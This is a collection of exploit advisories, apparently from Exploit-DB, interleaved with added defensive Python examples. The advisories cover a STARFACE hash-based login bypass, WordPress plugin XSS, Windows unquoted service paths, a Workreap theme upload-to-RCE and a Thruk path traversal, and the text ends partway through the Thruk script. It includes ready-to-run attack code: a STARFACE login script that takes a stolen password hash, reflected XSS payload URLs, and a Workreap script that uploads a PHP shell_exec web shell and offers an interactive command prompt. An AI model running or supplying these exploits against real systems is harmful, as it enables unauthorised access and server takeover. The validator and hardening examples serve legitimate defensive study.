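Three of the write-ups on this page are upload flaws of the same shape: the Faculty Evaluation System accepts a file without login and lists it under assets/uploads/, the Total CMS file is a PNG header with PHP behind it, and the File Manager Advanced request lets the client choose the permitted MIME type (upload_allow). The validator below is an added example, not code from any of these projects: it keeps the policy on the server, checks the extension and the file's own bytes, scans for a PHP open tag, and assigns a random storage name. The allowed and executable extension lists are assumptions to be adjusted to the deployment; the sample files are constructed.

```python
import os
import re
import secrets

# Server-side allow-list: extension -> magic bytes the content must start with.
# This policy lives on the server; a client-supplied value such as the
# upload_allow field in the request above must never replace it.
ALLOWED_TYPES = {
    "png": b"\x89PNG\r\n\x1a\n",
    "jpg": b"\xff\xd8\xff",
    "gif": b"GIF8",
}
# Extensions the web server may hand to an interpreter (assumed list; extend it
# to whatever handlers the deployment actually enables).
EXECUTABLE_EXTENSIONS = {"php", "php3", "php4", "php5", "phtml", "phar"}
PHP_OPEN_TAG = re.compile(rb"<\?(php|=)", re.IGNORECASE)


class UploadRejected(ValueError):
    """Raised with a human-readable reason when an upload fails validation."""


def validate_upload(client_filename, content, client_mime=None):
    """Validate an image upload and return (extension, random storage name).

    `client_mime` is accepted only to make the point that it is ignored: the
    decision rests on the server's allow-list and the file's own bytes.
    """
    base = os.path.basename(client_filename.replace("\\", "/"))
    parts = base.lower().split(".")
    if len(parts) < 2 or not parts[0]:
        raise UploadRejected("file name has no extension")
    extensions = parts[1:]
    # shell.php.png must fail too: reject an executable extension anywhere in the name.
    if any(e in EXECUTABLE_EXTENSIONS for e in extensions):
        raise UploadRejected("executable extension in file name")
    ext = "jpg" if extensions[-1] == "jpeg" else extensions[-1]
    if ext not in ALLOWED_TYPES:
        raise UploadRejected(f"extension .{ext} is not in the allow-list")
    if not content.startswith(ALLOWED_TYPES[ext]):
        raise UploadRejected("content does not match the claimed image type")
    # A valid-looking PNG header with PHP behind it passes a magic-byte check,
    # so the body is scanned as well.
    if PHP_OPEN_TAG.search(content):
        raise UploadRejected("image body contains a PHP open tag")
    # Never reuse the client's name: a random name defeats guessable URLs and
    # makes a directory listing useless for finding a specific file.
    return ext, f"{secrets.token_hex(16)}.{ext}"


def rejection_reason(client_filename, content, client_mime=None):
    """The rejection message, or None when the upload is accepted."""
    try:
        validate_upload(client_filename, content, client_mime)
    except UploadRejected as exc:
        return str(exc)
    return None


# Constructed samples: a minimal PNG header and a PNG/PHP polyglot in the
# shape of the Total CMS file above (header, PHP, IEND marker).
PNG_HEADER = b"\x89PNG\r\n\x1a\n" + b"\x00" * 16
PNG_PHP_POLYGLOT = b"\x89PNG\r\n\x1a\n...<?php /* anything */ ?>IEND"
```

The body scan is defence in depth only. What actually prevents execution is storing uploads outside the web root (or in a directory with script handlers disabled), serving them under the random name, and keeping directory listings off, which removes the second half of the Faculty Evaluation System chain.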
            
Exploit Title: STARFACE 7.3.0.10 - Authentication with Password Hash Possible
Affected Versions: 7.3.0.10 and earlier versions
Fixed Versions: -
Vulnerability Type: Broken Authentication
Security Risk: low
Vendor URL: https://www.starface.de
Vendor Status: notified
Advisory URL: https://www.redteam-pentesting.de/advisories/rt-sa-2022-004
Advisory Status: published
CVE: CVE-2023-33243
CVE URL: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-33243


Introduction
============

"When functionality and comfort come together, the result is a
state-of-the-art experience that we've dubbed 'comfortphoning'. It's a
secure, scalable digital communication solution that meets every need
and wish. STARFACE is easy to integrate into existing IT systems and
flexibly grows with your requirements."

(from the vendor's homepage)


More Details
============

The image of STARFACE PBX [0] in version 7.3.0.10 can be downloaded from
the vendor's homepage [1]. The included files can be further examined by
either extracting the contents or running the image in a virtual
machine. The web interface of the PBX uses the JavaScript file at the
following path to submit the login form:

------------------------------------------------------------------------
js/prettifier.js
------------------------------------------------------------------------

The following two lines of the JavaScript file "prettifier.js" add the
two parameters "secret" and "ack" to the form before it is submitted:

------------------------------------------------------------------------
$form(document.forms[0]).add('secret', createHash(defaultVals.isAd, liv, lpv, defaultVals.k + defaultVals.bk));
$form(document.forms[0]).add('ack', defaultVals.k);
------------------------------------------------------------------------

The JavaScript object "defaultVals" is included in the web application's
source text. While the value of "defaultVals.k" was found to be the
static hash of the PBX version, the value of "defaultVals.bk" contains a
nonce only valid for the currently used session. Therefore, the form
parameter "ack" is always the same value. For the form value "secret"
the function "createHash()" is called with different arguments. The
value of "defaultVals.isAd" is set to "false" when login via Active
Directory is disabled. The parameters "liv" and "lpv" contain the
username and password entered into the form respectively.

------------------------------------------------------------------------
const createHash = function (isAD, user, pass, nonces) {
    if (isAD) {
        return forAD.encode(user + nonces + pass);
    }
    return user + ':' + forSF(user + nonces + forSF(pass));
};
------------------------------------------------------------------------

The expression after the second return statement is the implementation
used when Active Directory login is disabled, which is the default
setting. The return value is composed of the username, a colon, and a
value built using the "forSF()" function. The "forSF()" function was
found to calculate the SHA512 hash value. When considering the arguments
passed to the function, the hash is calculated as follows:

------------------------------------------------------------------------
SHA512(username + defaultVals.k + defaultVals.bk + SHA512(password))
------------------------------------------------------------------------

As can be seen, instead of the cleartext password the SHA512 hash of the
password is used in the calculation. In conclusion, for the form value
"secret" the following value is transmitted:

------------------------------------------------------------------------
username + ":" + SHA512(
  username + defaultVals.k + defaultVals.bk + SHA512(password)
)
------------------------------------------------------------------------

If the SHA512 hash of a user's password is known, it can be directly
used in the calculation of the "secret" during the login process.
Knowledge of the cleartext password is not required.

This finding was also verified by analysing the decompiled Java code of
the server component. It was also found that the authentication process
of the REST API is vulnerable in a very similar manner.
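The property described above, that the stored hash is itself a sufficient credential, can be shown with a small verifier of the same structure. The following is an added example and not STARFACE code: HashChallengeServer stands in for a server that stores SHA512(password) and checks SHA512(username + k + nonce + stored value); SaltedVerifierServer contrasts it with a design where the stored value is a salted scrypt digest and the client submits the password itself, so a leaked record cannot be used to log in. The user "0001" with password "starface" follows the advisory; the version hash is a constructed placeholder.

```python
import hashlib
import hmac
import secrets


def sha512_hex(text):
    """Hex SHA512 of a string, as used on both sides of the login described above."""
    return hashlib.sha512(text.encode("utf-8")).hexdigest()


class HashChallengeServer:
    """Verifier with the structure described in the advisory (a stand-in, not
    STARFACE code): the database holds SHA512(password) and the login proof is
    SHA512(username + k + nonce + that stored value)."""

    def __init__(self, users, version_hash="constructed-version-hash"):
        self.k = version_hash  # stands in for the static defaultVals.k
        self.store = {user: sha512_hex(pw) for user, pw in users.items()}
        self.issued_nonces = set()

    def new_nonce(self):
        """Per-session nonce (the role of defaultVals.bk); accepted once only."""
        nonce = secrets.token_hex(16)
        self.issued_nonces.add(nonce)
        return nonce

    def verify(self, username, nonce, secret):
        if nonce not in self.issued_nonces:
            return False
        self.issued_nonces.discard(nonce)
        stored = self.store.get(username)
        if stored is None:
            return False
        expected = sha512_hex(username + self.k + nonce + stored)
        return hmac.compare_digest(expected, secret)


def secret_from_password(username, k, nonce, password):
    """What the login form computes when the user types the password."""
    return sha512_hex(username + k + nonce + sha512_hex(password))


def secret_from_hash(username, k, nonce, password_hash):
    """The same proof built from the stored hash alone; no password needed."""
    return sha512_hex(username + k + nonce + password_hash)


class SaltedVerifierServer:
    """Contrast: the stored value is a salted scrypt digest and the client
    submits the password itself (over TLS). A leaked record is useless as a
    login credential because the server expects the password, not the digest."""

    SCRYPT = dict(n=2 ** 14, r=8, p=1)

    def __init__(self, users):
        self.store = {}
        for user, password in users.items():
            salt = secrets.token_bytes(16)
            digest = hashlib.scrypt(password.encode("utf-8"), salt=salt, **self.SCRYPT)
            self.store[user] = (salt, digest)

    def verify(self, username, password):
        record = self.store.get(username)
        if record is None:
            return False
        salt, digest = record
        candidate = hashlib.scrypt(password.encode("utf-8"), salt=salt, **self.SCRYPT)
        return hmac.compare_digest(candidate, digest)


if __name__ == "__main__":
    server = HashChallengeServer({"0001": "starface"})
    nonce = server.new_nonce()
    leaked_hash = server.store["0001"]  # what a database dump would contain
    print("login with hash only:", server.verify("0001", nonce, secret_from_hash("0001", server.k, nonce, leaked_hash)))
    hardened = SaltedVerifierServer({"0001": "starface"})
    print("leaked digest as password:", hardened.verify("0001", hardened.store["0001"][1].hex()))
```

The nonce defeats replay of a captured "secret" but not a leaked database: any challenge-response scheme in which the server stores exactly the value the client must know is replayable from that store. Encrypting the stored hashes, as in the vendor's interim fix described below, raises the bar only as far as the key stays out of reach.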


Proof of Concept
================

The following Python script can be used to perform a login by specifying
a target URL, a username and the associated password hash:

------------------------------------------------------------------------
#!/usr/bin/env python3

import click
import hashlib
import re
import requests
import typing


def get_values_from_session(url, session) -> typing.Tuple[str, str]:
    """Read the version hash (k) and the session nonce (bk) from the login page."""
    k, bk = "", ""
    response_content = session.get(f"{url}/jsp/index.jsp").text
    k_result = re.search(r"\sk : '([^']+)'", response_content)
    bk_result = re.search(r"\sbk : '([^']+)'", response_content)
    if k_result is not None:
        k = k_result.group(1)
    if bk_result is not None:
        bk = bk_result.group(1)
    return k, bk


def web_login(url, login, pwhash, session) -> bool:
    version, nonce = get_values_from_session(url, session)
    if version == "" or nonce == "":
        print("Web Login failed: Nonce and version hash can not be retrieved.")
        return False
    # secret = SHA512(username + k + bk + SHA512(password)); only the hash is needed
    value = login + version + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {
        "forward": "",
        "autologin": "false",
        "secret": f"{login}:{secret}",
        "ack": version,
    }
    login_request = session.post(
        f"{url}/login",
        data=data,
        allow_redirects=False,
        headers={"Referer": f"{url}/jsp/index.jsp"},
    )
    response_headers = login_request.headers
    if "Set-Cookie" in response_headers:
        session_id = response_headers["Set-Cookie"].split("=")[1].split(";")[0]
        print(f"Session ID: {session_id}")
        return True
    else:
        print("Invalid login data")
        return False


def get_nonce_from_api(url, session) -> str:
    response_content = session.get(f"{url}/rest/login").json()
    return response_content["nonce"] if "nonce" in response_content else ""


def rest_login(url, login, pwhash, session):
    nonce = get_nonce_from_api(url, session)
    if nonce == "":
        print("REST Login failed: Nonce can not be retrieved.")
        return
    # The REST API omits the version hash: secret = SHA512(username + nonce + SHA512(password))
    value = login + nonce + pwhash
    secret = hashlib.sha512(value.encode("utf-8")).hexdigest()
    data = {"loginType": "Internal", "nonce": nonce, "secret": f"{login}:{secret}"}
    login_request = session.post(
        f"{url}/rest/login",
        json=data,
        headers={"Content-Type": "application/json", "X-Version": "2"},
    )
    response_data = login_request.json()
    token = response_data["token"] if "token" in response_data else "none"
    print(f"REST API Token: {token}")


@click.command()
@click.option('--url', help='Target System URL', required=True)
@click.option('--login', help='Login ID', required=True)
@click.option('--pwhash', help='Password Hash', required=True)
def login(url, login, pwhash):
    session = requests.session()
    stripped_url = url.rstrip("/")
    result = web_login(stripped_url, login, pwhash, session)
    if result:
        rest_login(stripped_url, login, pwhash, session)


if __name__ == "__main__":
    login()
------------------------------------------------------------------------

For example, the SHA512 hash of the password "starface" can be
calculated as follows:

------------------------------------------------------------------------
$ echo -n "starface" | sha512sum
a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec -
------------------------------------------------------------------------

The Python script can be run as follows to perform a login as the user
"0001" with the aforementioned hash:

------------------------------------------------------------------------
$ python3 login.py --url 'https://www.example.com' --login 0001 --pwhash
'a37542915e834f6e446137d759cdcb825a054d0baab73fd8db695fc49529bc8e52eb27979dd1dcc21849567bac74180f6511121f76f4a2a1f196670b7375f8ec'
Session ID: 2CF09656E274F000FFAD023AF37629CE
REST API Token: 51eef8f8vp3d3u81k0imjbuuu7
------------------------------------------------------------------------

When the password hash is valid for the specified user of the targeted
instance a session ID as well as a REST API token is returned.
Afterwards, these values can be used to interact with the web
application and the REST API.


Workaround
==========

None


Fix
===

On 4 May 2023, version 8.0.0.11 was released. In this version the
vulnerability was addressed with a temporary solution, such that the
password hashes are encrypted before they are saved in the database.
This approach prevents attackers from exploiting this vulnerability in
scenarios where they have only acquired pure database access. However,
attackers with system level access can bypass this temporary measure as
they can extract the encryption key and decrypt the hashes in the
database. A solution that fixes this vulnerability entirely is still in
progress.


Security Risk
=============

The web interface and REST API of STARFACE allow logging in with the
password hash instead of the cleartext password. This can be exploited
by attackers who gained access to the application's database, where the
passwords are saved as the SHA512 hash of the cleartext passwords.
While the precondition for this attack could be the full compromise of
the STARFACE PBX, another attack scenario could be that attackers
acquire access to backups of the database stored on another system.
Furthermore, the login via password hash gives attackers permanent
unauthorised access to the web interface even if system access was
obtained only temporarily. Due to the prerequisite of obtaining access
to password hashes, the vulnerability poses a low risk only.


Timeline
========

2022-12-06 Vulnerability identified
2022-12-13 Customer approved disclosure to vendor
2023-01-11 Vendor notified
2023-05-04 Vendor released new version 8.0.0.11
2023-05-19 CVE ID requested
2023-05-20 CVE ID assigned
2023-06-01 Advisory released


References
==========

[0] https://starface.com/en/products/comfortphoning/
[1] https://knowledge.starface.de/pages/viewpage.action?pageId=46564694


-- 
RedTeam Pentesting GmbH                   Tel.: +49 241 510081-0
Alter Posthof 1                           Fax : +49 241 510081-99
52062 Aachen                    https://www.redteam-pentesting.de
Germany                         Registergericht: Aachen HRB 14004
Geschäftsführer:                       Patrick Hof, Jens Liebchen
            
# Exploit Title: Tree Page View Plugin 1.6.7 - Cross Site Scripting (XSS)
# Google Dork: inurl:/wp-content/plugins/cms-tree-page-view/
# Date: 2023-04-24
# Exploit Author: LEE SE HYOUNG (hackintoanetwork)
# Vendor Homepage: https://wordpress.org/plugins/cms-tree-page-view/
# Software Link: https://downloads.wordpress.org/plugin/cms-tree-page-view.1.6.6.zip
# Category: Web Application
# Version: 1.6.7
# Tested on: Debian / WordPress 6.1.1
# CVE : CVE-2023-30868
# Reference: https://patchstack.com/database/vulnerability/cms-tree-page-view/wordpress-cms-tree-page-view-plugin-1-6-7-cross-site-scripting-xss-vulnerability?_s_id=cve

# 1. Technical Description:
The CMS Tree Page View plugin for WordPress has a Reflected Cross-Site Scripting vulnerability up to version 1.6.7.
This is due to the post_type parameter not properly escaping user input. As a result, users with administrator privileges or higher can inject JavaScript code that will execute whenever accessed.


# 2. Proof of Concept (PoC):

WordPress CMS Tree Page View Plugin <= 1.6.7 Cross-Site Scripting (XSS)
In the case of this vulnerability, there are two XSS PoCs available: one for version 1.6.6 and another for version 1.6.7.

1. CMS Tree Page View Plugin <= 1.6.6

  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22%3E%3Cscript%3Ealert%281%29%3C%2Fscript%3E.

  b.  your payload will be executed.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.

2. CMS Tree Page View Plugin <= 1.6.7

  a. Send the following URL to users with administrator privileges or higher: http://localhost:8888/wp-admin/edit.php?page=cms-tpv-page-post&post_type=%22+accesskey%3DC+onclick%3Djavascript%3Aalert%281%29%3B+a%3D%22.

  b. The injected onclick handler fires when the user presses Ctrl + Alt + c (Mac) or Alt + Shift + c (Windows). This payload contains no angle brackets; it only breaks out of the quoted attribute, which is why it still works on 1.6.7 where the script-tag payload does not.

[!] note : To make the payload work, the "In menu" option under Settings -> CMS Tree Page View -> Select where to show a tree for pages and custom post types needs to be enabled for posts.
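Why the 1.6.7 payload needs no angle brackets, shown with a small added Python example (not the plugin's code): three ways of placing post_type into the href attribute are parsed with Python's html.parser, standing in for the browser. The bracket-stripping filter is hypothetical, assumed only to illustrate that removing < and > does not stop an attribute-context injection; the fix is to escape quotes as well.

```python
import html
from html.parser import HTMLParser

# The two payloads from the PoC above, URL-decoded.
PAYLOAD_166 = '"><script>alert(1)</script>'
PAYLOAD_167 = '" accesskey=C onclick=javascript:alert(1); a="'

# Simplified stand-in for the menu link the plugin renders (assumed markup).
TEMPLATE = '<a href="edit.php?page=cms-tpv-page-post&amp;post_type={}">Tree</a>'


def render_unescaped(post_type):
    """Vulnerable: the parameter is placed inside a quoted attribute as-is."""
    return TEMPLATE.format(post_type)


def render_strip_brackets(post_type):
    """Hypothetical filter that only removes '<' and '>' (not the plugin's actual code)."""
    return TEMPLATE.format(post_type.replace("<", "").replace(">", ""))


def render_escaped(post_type):
    """Hardened: attribute-context escaping; quote=True also encodes the quote characters."""
    return TEMPLATE.format(html.escape(post_type, quote=True))


class _TagCollector(HTMLParser):
    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


def analyse(markup):
    """Parse the rendered fragment the way a browser would and report what got injected."""
    parser = _TagCollector()
    parser.feed(markup)
    parser.close()
    tags = [tag for tag, _ in parser.tags]
    extra_attrs = set()
    for _, attrs in parser.tags:
        extra_attrs |= {name for name in attrs if name != "href"}
    return {"tags": tags, "extra_attrs": extra_attrs}


if __name__ == "__main__":
    renderers = [("unescaped", render_unescaped),
                 ("strip <>", render_strip_brackets),
                 ("escaped", render_escaped)]
    for name, render in renderers:
        for label, payload in [("1.6.6 payload", PAYLOAD_166), ("1.6.7 payload", PAYLOAD_167)]:
            print(f"{name:10} {label}: {analyse(render(payload))}")
```

With the unescaped template the first payload yields a second `script` element and the second payload yields `accesskey`/`onclick` attributes; the bracket-stripping filter blocks only the first. Escaping with quotes leaves a single `a` element with nothing but `href`.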
            
# Exploit Title: Macro Expert 4.9 - Unquoted Service Path
# Date: 04/06/2023
# Exploit Author: Murat DEMIRCI
# Vendor Homepage: http://www.macro-expert.com/
# Software Link: http://www.macro-expert.com/product/gm_setup_4.9.exe
# Version: 4.9
# Tested on: Windows 10

# Proof of Concept :

C:\Users\Murat>sc qc "Macro Expert"
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: Macro Expert
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Macro Expert
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

# BINARY_PATH_NAME contains spaces but is not quoted, so when the service starts Windows tries
# c:\program.exe, c:\program files.exe and c:\program files (x86)\grasssoft\macro.exe before the
# intended MacroService.exe. A local user who can write to one of those locations gets code
# execution as LocalSystem the next time the service starts (it is AUTO_START, so at boot).
            
# Exploit Title: USB Flash Drives Control 4.1.0.0 - Unquoted Service Path
# Date: 2023-05-31
# Exploit Author: Jeffrey Bencteux
# Vendor Homepage: https://binisoft.org/
# Software Link: https://binisoft.org/wfc
# Version: 4.1.0.0
# Tested on: Microsoft Windows 11 Pro
# Vulnerability Type: Unquoted Service Path

PS C:\> wmic service get name,displayname,pathname,startmode | findstr /i "auto" | findstr /i /v "c:\windows"
USB Flash Drives Control       usbcs       C:\Program Files\USB Flash Drives Control\usbcs.exe       Auto

PS C:\> sc.exe qc usbcs
[SC] QueryServiceConfig SUCCESS

SERVICE_NAME: usbcs
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : C:\Program Files\USB Flash Drives Control\usbcs.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : USB Flash Drives Control
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem

PS C:\> systeminfo
OS Name:                   Microsoft Windows 11 Pro
OS Version:                10.0.22621 N/A Build 22621
OS Manufacturer:           Microsoft Corporation

-- 
Jeffrey BENCTEUX
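Both unquoted-service-path advisories above rely on the same Windows behaviour: when a service's BINARY_PATH_NAME is unquoted and contains spaces, the service control manager tries each space-delimited prefix with .exe appended before reaching the real image. The following Python is an added example, not part of either advisory, that parses `sc qc` output (the Macro Expert output is embedded as the constructed sample) and lists those candidate paths in the order Windows tries them. Checking whether a low-privileged user can write to the candidates' parent directories has to be done on the live host.

```python
import re

# Constructed sample: the `sc qc` output quoted in the Macro Expert advisory above.
SC_QC_SAMPLE = r"""
SERVICE_NAME: Macro Expert
        TYPE               : 10  WIN32_OWN_PROCESS
        START_TYPE         : 2   AUTO_START
        ERROR_CONTROL      : 1   NORMAL
        BINARY_PATH_NAME   : c:\program files (x86)\grasssoft\macro expert\MacroService.exe
        LOAD_ORDER_GROUP   :
        TAG                : 0
        DISPLAY_NAME       : Macro Expert
        DEPENDENCIES       :
        SERVICE_START_NAME : LocalSystem
"""


def parse_sc_qc(text):
    """Turn `sc qc` output into a dict of FIELD -> value."""
    fields = {}
    for line in text.splitlines():
        match = re.match(r"\s*([A-Z_]+)\s*:\s*(.*)$", line)
        if match:
            fields[match.group(1)] = match.group(2).strip()
    return fields


def image_path(binary_path_name):
    """Drop service arguments: keep everything up to and including the first '.exe'."""
    match = re.match(r"(.+?\.exe)", binary_path_name, re.IGNORECASE)
    return match.group(1) if match else binary_path_name


def is_unquoted_with_spaces(binary_path_name):
    """The vulnerable pattern: no surrounding quotes and at least one space in the image path."""
    path = binary_path_name.strip()
    return not path.startswith('"') and " " in image_path(path)


def hijack_candidates(binary_path_name):
    """
    Paths that CreateProcess tries, in order, before the intended image when the
    path is unquoted: the string is cut at each space and '.exe' appended.
    """
    path = image_path(binary_path_name)
    candidates = []
    pos = path.find(" ")
    while pos != -1:
        candidates.append(path[:pos] + ".exe")
        pos = path.find(" ", pos + 1)
    return candidates


def assess(sc_qc_text):
    """Summarise one service: vulnerable pattern or not, and where a planted binary would go."""
    fields = parse_sc_qc(sc_qc_text)
    binary = fields.get("BINARY_PATH_NAME", "")
    unquoted = is_unquoted_with_spaces(binary)
    return {
        "service": fields.get("SERVICE_NAME"),
        "account": fields.get("SERVICE_START_NAME"),
        "auto_start": "AUTO_START" in fields.get("START_TYPE", ""),
        "unquoted": unquoted,
        "candidates": hijack_candidates(binary) if unquoted else [],
    }


if __name__ == "__main__":
    report = assess(SC_QC_SAMPLE)
    print(f"{report['service']} runs as {report['account']}, unquoted={report['unquoted']}")
    for candidate in report["candidates"]:
        # On a live host, test whether an unprivileged user can write to each parent directory.
        print("  would be tried first:", candidate)
```

Run it on a real host by piping `sc qc <service>` into `assess`; the impact is only real when one of the listed parent directories (for example `C:\` or `C:\Program Files`) is writable by the user, which is not the default on a modern Windows install.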
            
# Exploit Title: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
# Dork: inurl:/wp-content/themes/workreap/
# Date: 2023-06-01
# Category : Webapps
# Vendor Homepage: https://themeforest.net/item/workreap-freelance-marketplace-wordpress-theme/23712454
# Exploit Author: Mohammad Hossein Khanaki(Mr_B0hl00l)
# Version: 2.2.2
# Tested on: Windows/Linux
# CVE: CVE-2021-24499


import random
import string
import sys
import requests

GREEN = '\033[92m'
RED = '\033[91m'
YELLOW = '\033[93m'
BOLD = '\033[1m'
ENDC = '\033[0m'

# The vulnerable admin-ajax action stores the uploaded file here without checking its extension.
UPLOAD_DIR = "/wp-content/uploads/workreap-temp/"


def usage():
    banner = '''
    NAME: WordPress Theme Workreap 2.2.2 - Unauthenticated Upload Leading to Remote Code Execution
    usage: python3 Workreap_rce.py <URL>
    example for linux : python3 Workreap_rce.py https://www.exploit-db.com
    example for Windows : python Workreap_rce.py https://www.exploit-db.com
    '''
    print(f"{BOLD}{banner}{ENDC}")


def random_name(length=8):
    return ''.join(random.choices(string.ascii_lowercase + string.digits, k=length))


def upload(target, file_name, body):
    """POST a file to the unauthenticated award_img upload action; True on success."""
    url = target + "/wp-admin/admin-ajax.php"
    data = {"action": "workreap_award_temp_file_uploader"}
    response = requests.post(url, data=data, files={"award_img": (file_name, body)})
    return '{"type":"success",' in response.text


def upload_file(target):
    print("[ ] Uploading File")
    file_name = random_name() + ".php"
    random_str = random_name()
    # Harmless probe: echoes a random marker so execution can be confirmed.
    body = "<?php echo '" + random_str + "';?>"
    if upload(target, file_name, body):
        print(f"{GREEN}[+] File uploaded successfully{ENDC}")
        check_php_file(target, file_name, random_str)
    else:
        print(f"{RED}[-] File was not uploaded{ENDC}")


def check_php_file(target, file_name, random_str):
    # If the marker comes back, the server executed the uploaded PHP.
    response_2 = requests.get(target + UPLOAD_DIR + file_name)
    if random_str in response_2.text:
        print(f"{GREEN}The uploaded PHP file executed successfully.{ENDC}")
        print("path: " + target + UPLOAD_DIR + file_name)
        question = input(f"{YELLOW}Do you want get RCE? [Y/n] {ENDC}")
        if question.lower() == "y":
            print("[ ] Uploading Shell ")
            get_rce(target)
        else:
            usage()
    else:
        print(f"{RED}[-] PHP file not allowed on this website. Try uploading another file.{ENDC}")


def get_rce(target):
    file_name = random_name() + ".php"
    body = '<?php $command = $_GET["c"]; $output = shell_exec($command); echo "<pre>\n$output</pre>";?>'
    if not upload(target, file_name, body):
        print(f"{RED}[-] Shell was not uploaded{ENDC}")
        return
    print(f"{GREEN}[+] Shell uploaded successfully{ENDC}")
    shell_url = target + UPLOAD_DIR + file_name
    while True:
        command = input(f"{YELLOW}Enter a command to execute: {ENDC}")
        print(f"Shell Path : {shell_url}?c={BOLD}{command}{ENDC}")
        # Send the command as a query parameter so spaces and shell metacharacters are URL-encoded.
        response_4 = requests.get(shell_url, params={"c": command})
        print(f"{GREEN}{response_4.text}{ENDC}")


if __name__ == "__main__":
    try:
        upload_file(sys.argv[1])
    except IndexError:
        usage()
    except requests.exceptions.RequestException:
        print("\nPlease Enter Valid Address")
            
# Exploit Title: Thruk Monitoring Web Interface 3.06 - Path Traversal
# Date: 08-Jun-2023
# Exploit Author: Galoget Latorre (@galoget)
# CVE: CVE-2023-34096 (Galoget Latorre)
# Vendor Homepage: https://thruk.org/
# Software Link: https://github.com/sni/Thruk/archive/refs/tags/v3.06.zip
# Software Link + Exploit + PoC (Backup): https://github.com/galoget/Thruk-CVE-2023-34096
# CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html
# GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h
# Affected Versions: <= 3.06
# Language: Python 3.x
# Tested on:
#  - Ubuntu 22.04.5 LTS 64-bit
#  - Debian GNU/Linux 10 (buster) 64-bit
#  - Kali GNU/Linux 2023.1 64-bit
#  - CentOS GNU/Linux 8.5.2111 64-bit


#!/usr/bin/python3
# -*- coding:utf-8 -*-

import sys
import warnings
import requests
from bs4 import BeautifulSoup
from termcolor import cprint


# Usage: python3 exploit.py <target.site>
# Example: python3 exploit.py http://127.0.0.1/thruk/


# Disable warnings
warnings.filterwarnings('ignore')


# Set headers
headers = {
    "User-Agent": "Mozilla/5.0 (Windows NT 10.0) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/104.0.0.0 Safari/537.36"
}


def banner():
    """
    Function to print the banner
    """

    banner_text = """
 __     __     __   __  __  __      __        __   __   __  
/  \\  /|_  __   _) /  \\  _)  _) __   _) |__| /  \\ (__\\ /__  
\\__ \\/ |__     /__ \\__/ /__ __)     __)    | \\__/  __/ \\__) 

                                                               
Path Traversal Vulnerability in Thruk Monitoring Web Interface ≤ 3.06
Exploit & CVE Author: Galoget Latorre (@galoget)
LinkedIn: https://www.linkedin.com/in/galoget
"""
    print(banner_text)


def usage_instructions():
    """
    Function that validates the number of arguments.
    The application MUST have 2 arguments:
    - [0]: Name of the script
    - [1]: Target URL (Thruk Base URL)
    """
    if len(sys.argv) != 2:
        print("Usage: python3 exploit.py <target.site>")
        print("Example: python3 exploit.py http://127.0.0.1/thruk/")
        sys.exit(0)


def check_vulnerability(thruk_version):
    """
    Function to check if the recovered version is vulnerable to CVE-2023-34096.
    Expects the banner format "vX.YY" or "vX.YY-Z", e.g. "v3.06" or "v3.06-2":
    "3.06" is compared as a float and the trailing "6-2" is read as 6.2.
    Prints additional information about the vulnerability.
    """
    try:
        if float(thruk_version[1:5]) <= 3.06:
            if float(thruk_version[4:].replace("-", ".")) < 6.2:
                cprint("[+] ", "green", attrs=['bold'], end = "")
                print("This version of Thruk is ", end = "")
                cprint("VULNERABLE ", "red", attrs=['bold'], end = "")
                print("to CVE-2023-34096!")
                print(" |  CVE Author Blog: https://galogetlatorre.blogspot.com/2023/06/cve-2023-34096-path-traversal-thruk.html")
                print(" |  GitHub Security Advisory: https://github.com/sni/Thruk/security/advisories/GHSA-vhqc-649h-994h")
                print(" |  CVE MITRE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-34096")
                print(" |  CVE NVD NIST: https://nvd.nist.gov/vuln/detail/CVE-2023-34096")
                print(" |  Thruk Changelog: https://www.thruk.org/changelog.html")
                print(" |  Fixed version: 3.06-2+")
                print("")
                return True
            else:
                cprint("[-] ", "red", attrs=['bold'], end = "")
                print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
                return False
        else:
            # Newer major/minor than 3.06: the fix is already included.
            cprint("[-] ", "red", attrs=['bold'], end = "")
            print("It looks like this version of Thruk is NOT VULNERABLE to CVE-2023-34096.")
            return False
    except (ValueError, IndexError):
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("There was an error parsing Thruk's version.\n")
        return False


def get_thruk_version():
    """
    Function to get Thruk's version via web scraping.
    It also verifies the title of the website to check if the target is a Thruk instance.
    """
    response = requests.get(target, headers=headers, allow_redirects=True, verify=False, timeout=10)
    html_soup = BeautifulSoup(response.text, "html.parser")

    if "<title>Thruk Monitoring Webinterface</title>" not in response.text:
        cprint("[-] ", "red", attrs=['bold'], end = "")
        print("Verify if the URL is correct and points to a Thruk Monitoring Web Interface.")
        sys.exit(-1)
    else:
        # Extract version anchor tag
        version_link = html_soup.find_all("a", {"class": "link text-sm"})

        if len(version_link) == 1 and version_link[0].has_attr('href'):
            thruk_version = version_link[0].text.strip()
            cprint("[+] ", "green", attrs=['bold'], end = "")
            print(f"Detected Thruk Version (Public Banner): {thruk_version}\n")
